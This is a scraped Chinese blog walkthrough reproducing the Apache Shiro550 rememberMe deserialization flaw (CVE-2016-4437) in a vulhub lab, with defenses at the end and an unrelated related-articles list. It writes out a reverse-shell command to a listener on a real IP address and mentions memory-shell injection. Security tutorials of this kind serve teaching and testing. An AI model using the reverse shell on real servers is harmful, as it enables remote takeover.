[渗透测试]-CVE-2016-4437-Shiro550漏洞复现

news2024/12/28 5:03:53

Shiro550漏洞爆出的时间是2016年为第4437个漏洞,所以它的CVE编码是2016-4437

文章目录

前言  什么是Shiro550漏洞?

1.Shiro550漏洞原理:

2.漏洞利用

3.漏洞复现:

  前提:下载并打开vulhub靶场。

  CVE-2016-4437-shiro550漏洞复现

总结  Shiro550 的防御措施:


前言  什么是Shiro550漏洞?

Shiro550漏洞(CVE-2016-4437)是Apache Shiro框架中的一个高危反序列化漏洞,主要影响版本为1.2.4及以前版本。该漏洞允许攻击者通过RememberMe功能实现远程代码执行(RCE)。


1.Shiro550漏洞原理:

Shiro框架的rememberme功能允许用户在下次访问时无需重新登录。

在处理rememberme字段时,Shiro会先进行Base64解码,然后使用AES解密,最后进行反序列化输出,通过两种不同的编码方式进行加解密。

这听起来很安全,但是Shiro的默认AES密钥是硬编码在框架中的,这使得hacker有可能通过爆破或其他手段获取到这个密钥。

一旦hacker获取了AES密钥,就可以构造一个恶意的序列化对象,将其AES加密并Base64编码后,作为rememberme字段发送给shiro服务端,服务端在接收到这个恶意的rememberme字段后,会进行Base64解码和AES解密,最后进行反序列化。

由于反序列化过程中没有进行有效的过滤处理,恶意对象中的代码将被执行,从而导致服务器遭受攻击。

2.漏洞利用

执行任意命令:hacker可以通过构造恶意的序列化对象来执行系统命令,从而控制目标服务器。

反弹shell: hacker可以在自己的服务器上开启一个监听服务,并将恶意代码发送给目标服务器,目标服务器在反序列化恶意对象时会执行其中的恶意代码,从而反弹一个shell给hacker。

3.漏洞复现:

前提:下载并打开vulhub靶场。

1.准备unbantu虚拟机或云服务器

2.去GitHub下载vulhub靶场。

cd vulhub-master       //进入靶场
ls                    
cd shiro/              //进入shiro
ls
cd CVE-2010-3863/      //进入shiro550
docker-compose build   //建立容器
docker-compose up -d   //拉取镜像
ufw allow 8080         //开放端口
ufw relod
docker ps -a           //查看端口

docker-compose down    //完成练习后关闭容器

CVE-2016-4437-shiro550漏洞复现

服务器ip:38 .6.177.124

使用工具检测:

步骤:

1.将url丢进目标地址->检测当前密钥

2.爆破密钥:

3.检测当前利用链

4.进行命令执行-whoami

执行成功。

命令执行:id

执行成功。

命令执行:反弹shell

unbatu虚拟机或kali:nc -lvp 7777

工具反弹shell:

bash -i >& /dev/tcp/ 38.6.177.124 /7777 0>&1

注:也许是我的靶机装在docker容器里,反弹shell时一直反弹不回去。

于是换了个公网地址:23.224.61.67  

反弹成功

3.注入内存码,尝试远程连接:


总结  Shiro550 的防御措施:

及时更新Apache Shiro框架到最新版本,确保已修复该漏洞。

对来自用户的输入进行严格的验证和过滤处理,以防止恶意代码的注入。

使用安全的加密算法和密钥管理策略来保护敏感数据。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2132021.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

基于react native的锚点

基于react native的锚点 效果示例图示例代码 效果示例图 示例代码 /* eslint-disable react-native/no-inline-styles */ import React, { useEffect, useRef, useState } from react; import {Image,ImageBackground,ScrollView,StyleSheet,Text,TouchableOpacity,View, } fr…

怎么选到好用的运动耳机?这五款年度精选骨传导耳机非常好用!

在过去的两年里,骨传导耳机逐渐被大众的所熟知。可能毕竟长时间使用音量过大的传统入耳式耳机,多多少少会对我们的听力健康构成威胁。所以很多人就想找一款不伤耳朵的耳机。然后就了解到了骨传导耳机,所以就会延伸出这些问题——骨传导耳机好…

【Canvas与密铺】90年代马赛克密铺效果 1920x1080

【成图】 【代码】 <!DOCTYPE html> <html lang"utf-8"> <meta http-equiv"Content-Type" content"text/html; charsetutf-8"/> <head><title>20世纪90年代马赛克瓷砖效果1920x1080</title><style type&…

美创获评CNVD年度原创漏洞发现贡献单位!

9月10日&#xff0c;第21届中国网络安全年会暨网络安全协同治理分论坛在广州成功举办。会上&#xff0c;美创科技首次获评“CNVD年度原创漏洞发现贡献单位”。 美创科技依托第59号安全实验室&#xff0c;专注数据安全技术和攻防研究。凭借深厚的技术积累与优势&#xff0c;被遴…

SEAFARING靶场渗透

一.SQL注入漏洞 1.输入id1 -- 下方出现数据说明闭合成功 2.测试得出数据库有三列 3.三处都是回显点 4.联合查询爆出库名 5.查表名 ?id-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schematest-- 6.查字段名 ?id-1 union sele…

vscode spring boot项目编辑yaml不自动提示补全如何解决

文章目录 properties能够自动弹出提示但是YAML文件就不会自动弹出提示ctrl空格不出提示的解决办法 properties能够自动弹出提示 但是YAML文件就不会自动弹出提示 只是不会自动弹出来而已&#xff0c;按ctrl空格即可解决 ctrl空格不出提示的解决办法 如果按ctrl空格没有用 …

WGCLOUD使用指南 - 自动计算磁盘剩余空间的可使用天数

WGCLOUD是一款免费开源的运维监控软件&#xff0c;性能优秀&#xff0c;部署简单&#xff0c;轻巧使用&#xff0c;支持大部分的Linux和Windows、安卓、MacOS等平台安装部署 最近发布的新版本&#xff0c;WGCLOUD新增了可以自动计算每个磁盘剩余空间的可使用天数&#xff0c;主…

你还在为写PPT而烦恼吗,Kimi一键帮你生成PPT

PPT已经成为我们日常工作和学习中不可或缺的一部分。无论是企业会议、学术报告还是产品展示&#xff0c;一个精心制作的PPT都能有效提升信息传递的效率和质量。然而&#xff0c;制作一个既美观又专业的PPT并非易事&#xff0c;它需要耗费大量的时间和精力。幸运的是&#xff0c…

中伟视界:皮带跑偏检测算法及其实现模型和判断方法

皮带输送机广泛应用于矿山、港口、化工等行业&#xff0c;其正常运行对生产效率和安全性至关重要。皮带跑偏是输送机常见的故障之一&#xff0c;可能导致物料撒落、设备损坏&#xff0c;甚至引发安全事故。为了有效监测和预防皮带跑偏&#xff0c;现代技术利用多种算法模型和判…

还有哪个地方能申请到免费一年期的SSL证书?

SSL证书是互联网中用于加密网站与访问者之间数据传输的安全证书。它通过数字签名确认网站的真实身份&#xff0c;确保数据传输的私密性、完整性和服务器身份的真实性&#xff0c;有效防止数据在传输过程中被窃取或篡改&#xff0c;是保障网站安全性的重要手段。 永久免费SSL证…

20240914 每日AI必读资讯

刚刚&#xff0c;OpenAI震撼发布o1大模型&#xff01;强化学习突破LLM推理极限 - OpenAI o1模型需要简单、直接的提示&#xff0c;而非复杂的指导。 - 避免使用思路链提示&#xff0c;因为o1模型已经具备内部推理能力。 - 使用分隔符来明确模型解析的部分&#xff0c;并限制…

绝佳的知乎展示形式,助力品牌信息全面曝光

知乎作为国内领先的中文互联网问答社区&#xff0c;汇聚了亿万高价值用户&#xff0c;其独特的内容生态与深度互动机制&#xff0c;为品牌提供了前所未有的营销舞台。云衔科技作为数字营销领域的佼佼者&#xff0c;携手知乎&#xff0c;为您量身打造了一套集信息流广告、知广告…

Debian11之DolphinScheduler使用

登录 默认用户名和密码 admin/dolphinscheduler123 http://192.168.111.180:12345/dolphinscheduler/ui基础配置 创建队列【admin用户下】 创建Worker分组管理【admin用户下】 关联某个工作节点服务器&#xff0c;创建项目的时候会指定Worker分组&#xff0c;这个配置决定了…

反思:我们如何实现自我的凤凰涅槃和卓越的人生?

目录 什么是凤凰涅槃&#xff1f; 一、起源与含义 二、文化解读 三、象征意义 ​编辑 我们如何实现自我的凤凰涅槃和卓越的人生&#xff1f; 一、心态调整 二、行为改变 三、持续学习与成长 四、具体行动步骤 什么是凤凰涅槃&#xff1f; 凤凰涅槃是一个具有深…

C++三大特性之一:多态篇【创作不易,还请点赞+收藏❤】

一、多态的概念 从我们学习C的时候&#xff0c;想必或多或少都听说过&#xff0c;C的三大特性&#xff1a;封装、继承&#xff0c;多态&#xff1b;而今天我们将学习多态&#xff0c;多态简单来讲&#xff0c;就是多种形式。多态分为&#xff0c;编译时多态——静态多态&#…

Spark-ShuffleWriter-UnsafeShuffleWriter

一、上下文 《Spark-ShuffleWriter》中对ShuffleWriter的获取、分类和写入做了简单的分析&#xff0c;下面我们对其中的UnsafeShuffleWriter做更详细的学习 二、构建UnsafeShuffleWriter public UnsafeShuffleWriter(BlockManager blockManager,TaskMemoryManager memoryMana…

利用Packet tracer搭建简单的网络并进行通信验证

利用Packet tracer搭建一个基本的网络通信&#xff1a; 1&#xff1a;创建网络组件 先去创建几个终端设备&#xff0c;然后再去创建一个交换机 布局完成的界面是&#xff1a; 2&#xff1a;连接组件 用指定的线进行连接交换机和PC机 全部连接的结果是: 3&#xff1a;配置PC机…

桥接网络设置多用户lxd容器

文章目录 前言配置宿主机网络固定内核版本安装 lxd、zfs 及 bridge-utils安装宿主机显卡驱动lxd 初始化创建容器模板安装容器显卡驱动复制容器 前言 使用桥接网络配置 lxd 有个好处&#xff0c;就是每个用户都可以在该局域网下有一个自己独立的 IP&#xff0c;该 IP 的端口可以…

崩坏星穹铁道PC端2.5版本剧情、奖励攻略 用GameViewer远程帮手机减负 随时畅玩星铁PC端

《崩坏&#xff1a;星穹铁道》2.5版本「碧羽飞黄射天狼」在9月10开启&#xff01;上半卡池有五星角色飞霄、知更鸟、卡芙卡、黑天鹅四位角色&#xff0c;还有2.5版本的新剧情&#xff0c;这一次崩铁上线送10连和 1000星琼等其他材料。由于游戏包体过大&#xff0c;不少玩家都选…

web群集--nginx实现重定向与重写操作的详细配置过程详与案例展示

文章目录 前言什么是重定向&#xff1f;重定向能做什么&#xff1f;何时需要重定向功能&#xff1f;nginx通过什么来实现重定向和重写操作的&#xff1f;nginx的重定向和重写有什么区别&#xff1f;案例展示重定向1.将所有对将所有对http://test. com 的访问重定向到http://www…